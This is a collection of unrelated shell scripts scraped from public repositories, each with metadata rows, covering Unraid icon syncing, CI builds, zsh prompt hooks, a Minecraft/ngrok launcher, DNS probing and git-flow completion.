# Create icon directory if not present then download selected icons. Skip if already done
downloadicons() {
if [ ! -d $DIR ] ; then
mkdir -vp $DIR
echo "I have created the icon store directory & now will start downloading selected icons"
checkgit
downloadstock
downloadwindows
downloadlinux
downloadfreebsd
downloadother
downloadmacos
echo "."
echo "."
echo "icons downloaded"
else
echo "."
echo "."
echo "Icons downloaded previously."
fi
}
# Sync icons in icon store to vm manager
syncicons() {
#make sure at least one file exists before trying to delete
touch /unraid_vm_icons/windowsxp.png
#delete all existing icons in vm manager
rm /unraid_vm_icons/*.*
#sync all icons selected to vm manager
rsync -a $DIR/ /unraid_vm_icons/
#reset permissions of appdata folder
chmod 777 -R /config/
#print message
echo "icons synced"
#play a tune if set
playtune
}
# Keep stock Unraid VM icons if set in template
downloadstock() {
if [ $stock == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Stock_Icons/ $DIR/
else
echo " unraid stock icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download windows based OS icons if set in template
downloadwindows() {
if [ $windows == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Windows/ $DIR/
else
echo " windows based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download linux based OS icons if set in template
downloadlinux() {
if [ $linux == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Linux/ $DIR/
else
echo " linux based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download freebsd based OS icons if set in template
downloadfreebsd() {
if [ $freebsd == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Freebsd/ $DIR/
else
echo " freebsd based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download other OS icons if set in template
downloadother() {
if [ $other == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Other/ $DIR/
else
echo " other os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download macOS based OS icons if set in template
downloadmacos() {
if [ $macos == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/macOS/ $DIR/
else
echo " macos based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Play tune on sync through beep speaker
playtune() {
if [ $tune == "yes" ] ; then
beep -f 130 -l 100 -n -f 262 -l 100 -n -f 330 -l 100 -n -f 392 -l 100 -n -f 523 -l 100 -n -f 660 -l 100 -n -f 784 -l 300 -n -f 660 -l 300 -n -f 146 -l 100 -n -f 262 -l 100 -n -f 311 -l 100 -n -f 415 -l 100 -n -f 523 -l 100 -n -f 622 -l 100 -n -f 831 -l 300 -n -f 622 -l 300 -n -f 155 -l 100 -n -f 294 -l 100 -n -f 349 -l 100 -n -f 466 -l 100 -n -f 588 -l 100 -n -f 699 -l 100 -n -f 933 -l 300 -n -f 933 -l 100 -n -f 933 -l 100 -n -f 933 -l 100 -n -f 1047 -l 400
fi
}
# set time before exiting container
exit_time() {
if [ "$sleeptimehuman" == "30 seconds" ] ; then
sleeptime=30
fi
if [ "$sleeptimehuman" == "1 minute" ] ; then
sleeptime=60
fi
if [ "$sleeptimehuman" == "2 minutes" ] ; then
sleeptime=120
fi
if [ "$sleeptimehuman" == "5 minutes" ] ; then
sleeptime=300
fi
if [ "$sleeptimehuman" == "10 minutes" ] ; then
sleeptime=600
fi
sleep $sleeptime
}
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # run functions # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
shall_i_delete
downloadicons
syncicons
exit_time
| true
|
47bb147dea8251bca3d2a55028178e2e9a66951e
|
Shell
|
Huawei/DJ_Ansible
|
/scripts/project002/todo/executeTodo.sh
|
UTF-8
| 1,305
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
# please modify USER、IP、PORT、USP4O
export API_USER=gatewayUser
export IP=""
export PORT="26335"
export USP4O="/yunwei/usp4o.jar"
TODO_TASK_NAME=$1
UUID_REG="\w{8}(-\w{4}){3}-\w{12}"
IPMC_USER="`stat -c '%U' $0`"
CURRENT_USER="`/usr/bin/id -u -n`"
if [[ "${IPMC_USER}" != "${CURRENT_USER}" ]]
then
echo "only ${IPMC_USER} can execute this script."
exit 1
fi
if [[ -z "${TODO_TASK_NAME}" ]]
then
echo "Todo task group name is empty, Please input todo task group name."
exit 1
fi
result=`su ossadm -c 'source /opt/oss/manager/bin/engr_profile.sh;$JAVA_HOME/bin/java -jar ${USP4O} ${IP} ${API_USER}'`
while read -r line
do
if [[ "$line" == "code:"* ]]
then
CODE=${line#code:}
continue
fi
if [[ "$line" == "passwd:"* ]]
then
PASSWORD=${line#passwd:}
continue
fi
done <<<"$result"
if [[ "$CODE" != "0000" ]]; then
echo "Query password from bastion host failed."
exit 1
fi
su ossadm -c "source /opt/oss/manager/bin/engr_profile.sh;python -c \"from executeTodoGroup import TodoExecutor;executor=TodoExecutor('${IP}','${PORT}','${API_USER}','${PASSWORD}');executor.execute_todo_group_by_name('${TODO_TASK_NAME}')\"" 2>/dev/null
if [[ $? -ne 0 ]]; then
echo "Execute todo task failed."
exit 1
fi
echo 0
| true
|
638910a136ec470a731398bc4c9819b7e2c4d9aa
|
Shell
|
tianbingsz/Paddle
|
/paddle/scripts/travis/build_and_test.sh
|
UTF-8
| 636
| 2.890625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
source ./common.sh
python -c 'import pip; print(pip.pep425tags.get_supported())'
if [[ "$TRAVIS_OS_NAME" == "osx" ]]; then
CMAKE_EXTRA="-DWITH_SWIG_PY=OFF"
else
CMAKE_EXTRA="-DWITH_SWIG_PY=ON"
fi
cmake .. -DWITH_GPU=OFF -DWITH_DOC=OFF -DWITH_TESTING=ON -DON_TRAVIS=ON -DON_COVERALLS=ON ${CMAKE_EXTRA}
NPROC=1
if [[ "$TRAVIS_OS_NAME" == "linux" ]]; then
NRPOC=`nproc`
make -j $NPROC
make coveralls
sudo make install
elif [[ "$TRAVIS_OS_NAME" == "osx" ]]; then
NPROC=`sysctl -n hw.ncpu`
make -j $NPROC
env CTEST_OUTPUT_ON_FAILURE=1 make test ARGS="-j $NPROC"
sudo make install
sudo paddle version
fi
| true
|
1995c3dab57b4d3b56469d5989111a371589f17b
|
Shell
|
chef/anka-buildkite-plugin
|
/tests/pre-command.bats
|
UTF-8
| 1,078
| 2.859375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bats
load '/usr/local/lib/bats/load.bash'
# Uncomment to enable stub debug output:
# export BUILDKITE_AGENT_STUB_DEBUG=/dev/tty
@test "Execute with PRE_COMMANDS (yaml list)" {
export BUILDKITE_PLUGIN_ANKA_PRE_COMMANDS="echo 123 && echo 456
echo got 123 && echo \" got 456 \"
buildkite-agent artifact download \"build.tar.gz\" . --step \":aws: Amazon Linux 1 Build\"
buildkite-agent artifact download \"build.tar.gz\" . --step \":aws: Amazon Linux 2 Build\""
stub buildkite-agent \
'artifact download "build.tar.gz" . --step ":aws: Amazon Linux 1 Build" : echo "downloaded artifact 1"' \
'artifact download "build.tar.gz" . --step ":aws: Amazon Linux 2 Build" : echo "downloaded artifact 2"'
run $PWD/hooks/pre-command
assert_success
assert_output --partial "123"
assert_output --partial "456"
assert_output --partial "got 123"
assert_output --partial " got 456"
assert_output --partial "downloaded artifact 1"
assert_output --partial "downloaded artifact 2"
unstub buildkite-agent
unset BUILDKITE_PLUGIN_ANKA_PRE_COMMANDS
}
| true
|
cff2cac3539723a5c7567b2f64d1863057e009e2
|
Shell
|
oldgcode/config
|
/zsh/precmd.zsh
|
UTF-8
| 3,667
| 4.03125
| 4
|
[] |
no_license
|
checkAndSetWindowTitle() {
local program_name="$1";
program_name=$(convertAliasToFull "$program_name");
# Set the window name to the currently running program.
if ! isShortName "$program_name"
then
setWindowTitle $(getTitleFromProgram "$program_name");
window_reset="yes"
fi
}
getTitleFromProgram() {
local program_name="$@";
local runningAsRoot="";
if [[ $program_name = ${program_name#sudo} ]] # || $program_name=${program_name#su} ]];
then
runningAsRoot=yes
fi
if __isroot
then
runningAsRoot=yes
fi
if [ -n $runningAsRoot ]; then
program_name="!$program_name"
fi
# Add an at mark at the beginning if running through ssh on a
# different computer.
if __inSSH; then
program_name="@$program_name"
# If tmux is running in SSH then display "@:hostname" as title
# in the term/outer screen.
if [[ $program_name == "@tmux" ]]; then
program_name="@:${HOST//.*/}"
# Use "@:!hostname" for root screens.
elif [[ $program_name == "@!tmux" ]]; then
program_name="@:!${HOST//.*/}"
fi
fi
echo $program_name;
}
# Change my shortcuts so the real name of the program is displayed.
convertAliasToFull() {
local text="$1"
# case $text in
# sgrep)
# text=grep
# ;;
# esac
echo "$text";
}
# Ignore often used commands which are only running for a very short
# time. This prevents a "blinking" look.
isShortName() {
[[ "$1" == (cd*|b|ls|la|ll|lls) ]] && return 0 ;
return 1;
}
# Create function per terminal. Don't check inside function for performance reasons
case "$TERM" in
screen*) # and tmux
setWindowTitle() {
print -n "\ek${(V)1}\e\\";
};;
xterm*)
setWindowTitle() {
print -n "\e]2;${(V)1}\e\\";
};;
*rxvt*)
setWindowTitle() {
print -n "\e]2;${(V)1}\e\\";
};;
Eterm*)
setWindowTitle() {
print -Pn "\e]2;$value\a\e[1;\a";
};;
*)
setWindowTitle() {
};;
esac
function resetWindowTitle() {
# Abort if no window name reset is necessary.
[[ -z $window_reset ]] && return
local name="zsh - $CWD";
setWindowTitle "$name";
# Just reset the name, so no screen reset necessary for the moment.
window_reset="";
}
#function changeTitlePreExec() {
# # The full command line comes in as "$1"
# local cmd="$1"
# local -a args
#
# args=${(z)tmpcmd}
#
# if [ "${args[1]}" = "fg" ] ; then
# local jobnum="${args[2]}"
# if [ -z "$jobnum" ] ; then
# # If no jobnum specified, find the current job.
# for i in ${(k)jobtexts}; do
# [ -z "${jobstates[$i]%%*:+:*}" ] && jobnum=$i
# done
# fi
# cmd="${jobtexts[${jobnum#%}]}"
# else
# fi
# title "$cmd"
#}
#function title() {
# # This is madness.
# # We replace literal '%' with '%%'
# # Also use ${(V) ...} to make nonvisible chars printable (think cat -v)
# # Replace newlines with '; '
# local value="${${${(V)1//\%/\%\%}//'\n'/; }//'\t'/ }"
# local location
#
# location="$HOST"
#
# # Special format for use with print -Pn
# value="%70>...>$value%<<"
# unset PROMPT_SUBST
# setopt LOCAL_OPTIONS
#}
# If ^C is pressed while typing a command, add it to the history so it can be
# easily retrieved later and then abort like ^C normally does. This is useful
# when I want to abort an command to do something in between and then finish
# typing the command.
TRAPINT() {
# Store the current buffer in the history.
zle && print -s -r -- $BUFFER
# Return the default exit code so Zsh aborts the current command.
return $1
}
autoload -Uz add-zsh-hook
add-zsh-hook precmd setCurrentPS1
add-zsh-hook preexec setExecutionTimer
add-zsh-hook preexec checkAndSetWindowTitle
add-zsh-hook precmd resetWindowTitle
#add-zsh-hook preexec changeTitlePreExec
| true
|
381bf3da12e703ce29c7964864fad24bd4282644
|
Shell
|
atmaivancevic/2017
|
/iTOL/runPrintPopupInfo.sh
|
UTF-8
| 393
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# Use this file to print popup HTML code for all genomes
# Takes as input a text file containing species names and NCBI txid number
# E.g. input txt file looks like:
#Macropus eugenii 9393
#Homo sapiens 9606
#...
while IFS= read -r line; do
echo "reading input: $line"
./printPopupInfo.sh $line >> htmlForPopup.txt
echo "###" >> htmlForPopup.txt
done < genomesAndTxidNos.txt
| true
|
f68d605afd018cc4ab47664af323415dac229955
|
Shell
|
Scott-Galloway/sg-setup
|
/admin_install.sh
|
UTF-8
| 906
| 3.21875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#Scott Galloway environment setup for admin
set -o errexit
set -o nounset
set -o pipefail
# set -o xtrace
ub_ver="$(lsb_release -d | awk -F: '{print $2}')"
#deb_ver="$(echo "$(uname -v)" | grep -i debian > /dev/null 2>&1;\
# echo $?)"
#cen_ver="$(echo "$(uname -v)" | grep -i centos > /dev/null 2>&1;\
# echo $?)"
#rhel_ver="$(echo "$(uname -v)" | grep -i enterprise > /dev/null\
# 2>&1; echo $?)"
if [[ "${ub_ver}" == *"Ubuntu"* ]]; then
add-apt-repository ppa:git-core/ppa
apt-get update
apt-get -y install curl git vim screen shellcheck
else
echo "Unknown distribution, fix and re-code."
exit 1
fi
tar -xvf VMware CLI tools
install VMware CLI Tools
sudo apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0:i386 gcc-multilib \
build-essential gcc uuid uuid-dev perl libssl-dev perl-doc liburi-perl \
libxml-libxml-perl libcrypt-ssleay-perl
exit 0
| true
|
387356e737b478691edbcbc2eb775c1d4536a2a3
|
Shell
|
Yusarin/K-VConsistency
|
/CausalMulticastRun.sh
|
UTF-8
| 851
| 2.875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
gradle jar
for id in $(seq 1 $1)
do
echo "$id"
echo $(uname)
if [ $(uname) = "Darwin" ]; then
if [ -n "$2" ]; then
echo "$2/$id"
osascript -e "tell application \"Terminal\" to do script \"cd $PWD && java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration $2/$id\""
else
osascript -e "tell application \"Terminal\" to do script \"cd $PWD && java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration\""
fi
else
if [ -n "$2" ]; then
echo "$2/$id"
gnome-terminal --tab -x zsh -c "java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration $2/$id"
else
gnome-terminal --tab -x zsh -c "java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration"
fi
fi
done
| true
|
3f84449e5006dc2a5f5b1757572612ba0f5aed3e
|
Shell
|
maorfr/git-keeper
|
/repos.sh
|
UTF-8
| 706
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
[ -z "$APP_INTERFACE_USER" ] && echo "Please define APP_INTERFACE_USER env var" && exit 1
[ -z "$APP_INTERFACE_PASSWORD" ] && echo "Please define APP_INTERFACE_PASSWORD env var" && exit 1
# APP_INTERFACE_URL default value
[ -z "${APP_INTERFACE_URL}" ] && APP_INTERFACE_URL="https://app-interface.devshift.net/graphql"
QUERY='{"query":"{ apps_v1 { codeComponents { url, resource }}}"}'
curl -s -H 'Content-Type: application/json' --user "${APP_INTERFACE_USER}:${APP_INTERFACE_PASSWORD}" --data-binary "$QUERY" "${APP_INTERFACE_URL}" | \
jq -r '.data.apps_v1[]|select(.codeComponents)|.codeComponents[]|select((.resource == "upstream") or (.resource == "saasrepo"))|.url' | \
sort -u
| true
|
9a16c8235e4089ee6a0a31c472cc4c4c1553fb14
|
Shell
|
zxt243416724/Openstack-HA-Deployment
|
/vm_install_rabbitmq_and_setting_native_cluster.sh
|
UTF-8
| 2,336
| 3.25
| 3
|
[] |
no_license
|
#!/usr/bin/bash
section=`hostname`
bind_ip=$(/usr/bin/bash readini.sh cluster_variables.ini $section int_ip)
master_vm_name=$(/usr/bin/bash readini.sh cluster_variables.ini default master)-vm
master_vm_ip=$(/usr/bin/bash readini.sh cluster_variables.ini $master_vm_name int_ip)
#we delete rabbitmq-server-master and kill any rabbitmq process and uninstall it compeletely!
pcs resource delete rabbitmq-cluster --force
service rabbitmq-server stop && ps -ef |grep rabbit|grep -v grep|awk '{print "kill -9",$2}'|sh
rpm -ql rabbitmq-server|awk '{printf("rm -rf %s\n",$1)}'|sh && yum erase -y rabbitmq-server
yum install -y rabbitmq-server
# NOTE: we need to bind the service to the internal IP address
cat > /etc/rabbitmq/rabbitmq-env.conf << EOF
NODE_IP_ADDRESS=$bind_ip
EOF
# required to generate the cookies at one node and copy it to other nodes
# if [ "$section" == "$master_vm_name" ]
# then
# systemctl start rabbitmq-server
# systemctl stop rabbitmq-server
# else
# echo "this node donot generate cookie,so we donot start MQ manually"
# systemctl stop rabbitmq-server
# fi
mkdir -p /var/lib/rabbitmq
chown -R rabbitmq:rabbitmq /var/lib/rabbitmq
#if install rabbitmq-server-3.6 and use rabbitmq-server-ha resource agent,pacemaker cluster will call /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh when cluster resurce start up,
#rabbitmq-server-3.6 will gernerate set_rabbitmq_policy.sh.example ,no set_rabbitmq_policy.sh
cp /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh.example /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
chmod 755 /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
sed -i '/^\${OCF_RESKEY_ctl}/d' /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
# echo '${OCF_RESKEY_ctl} set_policy ha-all "." '{"ha-mode":"all", "ha-sync-mode":"automatic"}' --apply-to all --priority 0' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
echo '${OCF_RESKEY_ctl} set_policy ha-all "." '\''{"ha-mode":"all", "ha-sync-mode":"automatic"}'\'' --apply-to all --priority 0' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
echo '${OCF_RESKEY_ctl} add_user openstack openstack' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
echo '${OCF_RESKEY_ctl} set_permissions openstack ".*" ".*" ".*" ' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
| true
|
2f1afe42fefec09417da8626cc74e7f70842b9c4
|
Shell
|
chopins/chopins.github.com
|
/download/pdnss
|
UTF-8
| 2,561
| 3.609375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
trap 'EX=1;exit' INT
trap 'EX=1;exit' TERM
EX=0
NSIPLIST='http://public-dns.info/nameservers.txt'
CACHE=$(dirname $(realpath $0))/cacheip.txt
echo '' > $CACHE
has_dns=3
has_domain=3
for arg in $*
do
if [ $has_dns -eq 1 ];then
NSIPLIST=$arg
has_dns=2
continue
fi
if [ $has_domain -eq 1 ];then
DOMAIN=$arg
has_domain=2
continue
fi
case $arg in
-h)
echo "Usage: $0 -n www.domain.com -d http://test11.com/ns.list.txt"
exit
;;
-d)
has_dns=1
;;
-n)
has_domain=1
;;
esac
done
if [ $# -eq 0 ];then
DOMAIN='www.google.com'
A='*'
elif [ $has_dns -eq 2 ] && [ $has_domain -eq 3 ]; then
DOMAIN='www.google.com'
A='*'
elif [ $has_dns -eq 3 ] && [ $has_domain -eq 3 ];then
DOMAIN=$1
fi
IFS='.' read -ra NSP <<< "$DOMAIN"
if [ ${#NSP[@]} -lt 3 ];then
A='@'
else
SUB=$[${#NSP[@]} - 2]
A=${NSP[@]:0:$SUB}
fi
echo "Fetch $DOMAIN in $NSIPLIST"
curl -s $NSIPLIST | while read -ra LINE;do
if [ $EX -eq 1 ];then
exit
fi
ns=$LINE
NS_IPV6=`echo $ns | grep ':'`
NS_CHK_IPV6=$?
if [ $NS_CHK_IPV6 -eq 0 ];then
continue
fi
echo -ne "DNS $ns \r"
dig $DOMAIN @$ns +tcp | while read -ra LINE;do
{
echo $LINE
if [ $EX -eq 1 ];then
exit
fi
cont=0
F=${LINE[0]:0:1}
case $F in
';')
continue
;;
esac
if [ -z $F ];then
continue
fi
if [ "${LINE[3]}" == 'A' ];then
IP=${LINE[4]}
IPV6=`echo $IP | grep ':'`
CHK_IPV6=$?
if [ $CHK_IPV6 -eq 0 ];then
continue
fi
grep -q $IP $CACHE
RET=$?
if [ $RET -eq 0 ];then
continue
fi
echo $IP >> $CACHE
#timeout 5 bash -c "echo >/dev/tcp/$IP/443" >/dev/null 2>&1 && echo "$A IN A $IP"
#OPENRE=`echo "\n" | timeout 10 openssl s_client -host $IP -port 443 -verify_hostname $ds -4 -quiet --verify 1 -prexit -crlf 2>&1`
curl -s --retry 0 --connect-timeout 3 --resolve $DOMAIN:443:$IP https://$DOMAIN > /dev/null
ORN=$?
if [ $ORN -gt 0 ];then
echo -ne "check $IP timeout \r"
continue
elif [ $ORN -eq 0 ];then
echo -e "\r$A IN A $IP"
fi
wait
fi
}
done
wait
done
| true
|
e0715d2d9f2bd0be5b7bf646d7581c93b2dd9da5
|
Shell
|
ElComeback/Kuminecraft-v.2.0-SP
|
/bin/minecraft.sh
|
UTF-8
| 1,607
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
# Abre Ngrok y si falla, reintenta en 10 segundos...
start_tunnel(){
while true
do
echo -n "Iniciando Ngrok... "
bin/ngrok tcp -authtoken $NGROK_API_TOKEN -log stdout --log-level debug ${mc_port} &> ngrok.log
echo -n "Fallido, reintentando en 10 segundos... "
sleep 10
done
}
graceful_shutdown(){
echo "Terminando $1 and $2"
kill $1 $2
wait $1
node last_sync.js
exit 0
}
echo 'Esperando 30 segundos para terminar la instancia'
sleep 30
echo 'Iniciando Despliegue'
mc_port=25565
if [ -z "$NGROK_API_TOKEN" ]; then
echo "Necesitas definir el valor NGROK_API_TOKEN para crear el tunel TCP!"
exit 2
fi
if [ -z "$DROPBOX_API_TOKEN" ]; then
echo "Necesitar definir el valor DROPBOX_API_TOKEN para sincronizar a Dropbox!"
exit 3
fi
# Inicia tunel Ngrok
start_tunnel &
ngrok_pid=$!
# Descarga el mundo
node init.js
# Crea la configuración del server
if [ ! -f server.properties ]; then
echo "server-port=${mc_port}" >> server.properties
fi
touch whitelist.json
touch banned-players.json
touch banned-ips.json
touch ops.json
#Maximo de Memoria configurable
heap=${HEAP:-"1G"}
echo "Iniciando: minecraft ${mc_port}"
java -Xmx${heap} -Xms${heap} -Xss512k -XX:+UseConcMarkSweepGC -jar server.jar nogui &
java_pid=$!
# trap "kill $ngrok_pid $java_pid" SIGTERM
trap "graceful_shutdown $java_pid $ngrok_pid" SIGTERM
# Inicia Sincronizacion
node sync_world.js &
# Inicia escucha en puerto: $PORT
node index.js &
# Curl el server cada 25 minutos para evitar su suspensión
while true
do
curl --silent 'http://herokucraft.herokuapp.com/' &> /dev/null
sleep 1500
done
| true
|
5b0191af795a5dddac25447ab7815c0c3cd218b7
|
Shell
|
xdamatada/dirty_rom_cooker
|
/scripts/buildscripts/prepdownload.sh
|
UTF-8
| 755
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Downloading the Source. Please wait"
echo "This will take anywhere between 30"
echo "minutes and four hours (Depending on"
echo "network Speed. This requires a 5-6gb"
echo "download"
echo
echo
echo "Downloading Repo"
cd ~/
mkdir -p ~/dirty/bin
export PATH=${PATH}:~/dirty/bin
curl https://dl-ssl.google.com/dl/googlesource/git-repo/repo > ~/dirty/bin/repo
chmod a+x ~/bin/repo
echo "Please paste the following from bash.txt to the TOP of .bashrc (will open when you press enter)"
read -p "Press enter to continue"
gedit ~/dirty/bash.txt
gedit ~/.bashrc
echo "Please reboot your PC. Press enter to reboot, then reload the menu, and hit option 4 under Build to begin source download"
read -p "Press enter to reboot"
sudo shutdown -r now
| true
|
9c0b73a5d3b1c763ca59190a5c1036b860212b8b
|
Shell
|
kdruelle/zsh
|
/plugins/git/git.flow.comp.zsh
|
UTF-8
| 15,253
| 3.734375
| 4
|
[] |
no_license
|
#!zsh
#
# Installation
# ------------
#
# To achieve git-flow completion nirvana:
#
# 0. Update your zsh's git-completion module to the newest verion.
# From here. http://zsh.git.sourceforge.net/git/gitweb.cgi?p=zsh/zsh;a=blob_plain;f=Completion/Unix/Command/_git;hb=HEAD
#
# 1. Install this file. Either:
#
# a. Place it in your .zshrc:
#
# b. Or, copy it somewhere (e.g. ~/.git-flow-completion.zsh) and put the following line in
# your .zshrc:
#
# source ~/.git-flow-completion.zsh
#
# c. Or, use this file as a oh-my-zsh plugin.
#
__git_flow_exsed(){
if [[ "$(uname)" == "Darwin" ]]; then
sed -E $@
return $?
elif [[ "$(name)" == "Linux" ]]; then
sed -r $@
return $?
fi
return 1
}
_git-flow ()
{
local curcontext="$curcontext" state line
typeset -A opt_args
_arguments -C \
':command:->command' \
'*::options:->options'
case $state in
(command)
local -a subcommands
subcommands=(
'init:Initialize a new git repo with support for the branching model.'
'feature:Manage your feature branches.'
'release:Manage your release branches.'
'hotfix:Manage your hotfix branches.'
'support:Manage your support branches.'
'version:Shows version information.'
'config:Manage your git-flow configuration.'
'log:Show log deviating from base branch.'
)
_describe -t commands 'git flow' subcommands
;;
(options)
case $line[1] in
(init)
_arguments \
-f'[Force setting of gitflow branches, even if already configured]' \
--showcommands'[Show git commands while executing them]' \
{'--delete','-d'}'[Use default branch naming conventions]' \
--local'[utiliser le fichier de configuration du dépôt]' \
--global'[utiliser les fichier de configuration global]' \
--system'[utiliser le fichier de configuration du système]' \
--file'[utiliser le fichier de configuration spécifié]:config file:_path_files'
;;
(version)
;;
(hotfix)
__git-flow-hotfix
;;
(release)
__git-flow-release
;;
(feature)
__git-flow-feature
;;
esac
;;
esac
}
__git-flow-release ()
{
local curcontext="$curcontext" state line
typeset -A opt_args
_arguments -C \
':command:->command' \
'*::options:->options'
case $state in
(command)
local -a subcommands
subcommands=(
'start:Start a new release branch.'
'finish:Finish a release branch.'
'list:List all your release branches. (Alias to `git flow release`)'
'publish:Publish release branch to remote.'
'track:Checkout remote release branch.'
)
_describe -t commands 'git flow release' subcommands
_arguments \
-v'[Verbose (more) output]'
;;
(options)
case $line[1] in
(start)
_arguments \
--showcommands'[Show git commands while executing them]' \
{'--fetch','-F'}'[Fetch from origin before performing finish]'\
{'--verbose','-v'}'[Verbose (more) output]'
':version:__git_flow_version_list'
;;
(finish)
_arguments \
--showcommands'[Show git commands while executing them]' \
{'--fetch','-F'}'[Fetch from origin before performing finish]'\
{'--sign','-s'}'[Sign the release tag cryptographically]'\
{'--signingkey','-u'}'[Use the given GPG-key for the digital signature (implies -s)]'\
{'--message','-m'}'[Use the given tag message]'\
{'--mesagefile','-f'}'[...]:message file:_path_files' \
{'--push','-p'}'[Push to $ORIGIN after performing finish]' \
{'--keep','-k'}'[Keep branch after performing finish]' \
--keepremote'[Keep the remote branch]' \
--keeplocal'[Keep the local branch]' \
{'--force_delete','-d'}'[Force delete release branch after finish]' \
{'--notag','-n'}"[Don't tag this release]" \
{'--nobackmerge','-b'}"[Don't back-merge master, or tag if applicable, in develop]" \
{'--squash','-S'}'[Squash release during merge]' \
':version:__git_flow_version_list'
;;
(publish)
_arguments \
--showcommands'[Show git commands while executing them]' \
':version:__git_flow_version_list'
;;
(track)
_arguments \
--showcommands'[Show git commands while executing them]' \
':version:__git_flow_version_list'
;;
*)
_arguments \
-v'[Verbose (more) output]'
;;
esac
;;
esac
}
__git-flow-hotfix ()
{
local curcontext="$curcontext" state line
typeset -A opt_args
_arguments -C \
':command:->command' \
'*::options:->options'
case $state in
(command)
local -a subcommands
subcommands=(
'start:Start a new hotfix branch.'
'finish:Finish a hotfix branch.'
'track:Checkout remote feature branch.'
'list:List all your hotfix branches. (Alias to `git flow hotfix`)'
)
_describe -t commands 'git flow hotfix' subcommands
_arguments \
-v'[Verbose (more) output]'
;;
(options)
case $line[1] in
(start)
_arguments \
--showcommands'[Show git commands while executing them]' \
{'--fetch','-F'}'[Fetch from origin before performing finish]'\
':hotfix:__git_flow_version_list'\
':branch-name:__git_branch_names'
;;
(finish)
_arguments \
--showcommands'[Show git commands while executing them]' \
{'--fetch','-F'}'[Fetch from origin before performing finish]'\
{'--sign','-s'}'[Sign the release tag cryptographically]'\
{'--signingkey','-u'}'[Use the given GPG-key for the digital signature (implies -s)]'\
{'--message','-m'}'[Use the given tag message]'\
{'--mesagefile','-f'}'[...]:message file:_path_files' \
{'--push','-p'}'[Push to $ORIGIN after performing finish]' \
{'--keep','-k'}'[Keep branch after performing finish]' \
--keepremote'[Keep the remote branch]' \
--keeplocal'[Keep the local branch]' \
{'--force_delete','-d'}'[Force delete release branch after finish]' \
{'--notag','-n'}"[Don't tag this release]" \
{'--nobackmerge','-b'}"[Don't back-merge master, or tag if applicable, in develop]" \
':hotfix:__git_flow_hotfix_list'
;;
(track)
_arguments \
--showcommands'[Show git commands while executing them]' \
':hotfix:__git_flow_remote_hotfix_list'\
;;
*)
_arguments \
-v'[Verbose (more) output]'
;;
esac
;;
esac
}
__git-flow-feature ()
{
local curcontext="$curcontext" state line
typeset -A opt_args
_arguments -C \
':command:->command' \
'*::options:->options'
case $state in
(command)
local -a subcommands
subcommands=(
'start:Start a new feature branch.'
'finish:Finish a feature branch.'
'list:List all your feature branches. (Alias to `git flow feature`)'
'publish:Publish feature branch to remote.'
'track:Checkout remote feature branch.'
'diff:Show all changes.'
'rebase:Rebase from integration branch.'
'checkout:Checkout local feature branch.'
'pull:Pull changes from remote.'
'delete:Delete a feature branch.'
)
_describe -t commands 'git flow feature' subcommands
_arguments \
-v'[Verbose (more) output]'
;;
(options)
case $line[1] in
(start)
_arguments \
--showcommands'[Show git commands while executing them]' \
{'--fetch','-F'}'[Fetch from origin before performing finish]'\
':feature:__git_flow_feature_list'\
':branch-name:__git_branch_names'
;;
(finish)
_arguments \
--showcommands'[Show git commands while executing them]' \
{'--fetch','-F'}'[Fetch from origin before performing finish]'\
{'--rebase','-r'}'[Rebase before merging]' \
{'--preserve-merges','-p'}'[Preserve merges while rebasing]' \
{'--keep','-k'}'[Keep branch after performing finish]' \
--keepremote'[Keep the remote branch]' \
--keeplocal'[Keep the local branch]' \
{'--force_delete','-D'}'[Force delete feature branch after finish]' \
{'--squash','-S'}'[Squash feature during merge]' \
--no-ff'[Never fast-forward during the merge]' \
':feature:__git_flow_feature_list'
;;
(publish)
_arguments \
--showcommands'[Show git commands while executing them]' \
':feature:__git_flow_feature_list'\
;;
(track)
_arguments \
--showcommands'[Show git commands while executing them]' \
':feature:__git_flow_remote_feature_list'\
;;
(diff)
_arguments \
--showcommands'[Show git commands while executing them]' \
':branch:__git_branch_names'\
;;
(rebase)
_arguments \
--showcommands'[Show git commands while executing them]' \
{'--interactive','-i'}'[Do an interactive rebase]' \
{'--preserve-merges','-p'}'[Preserve merges]' \
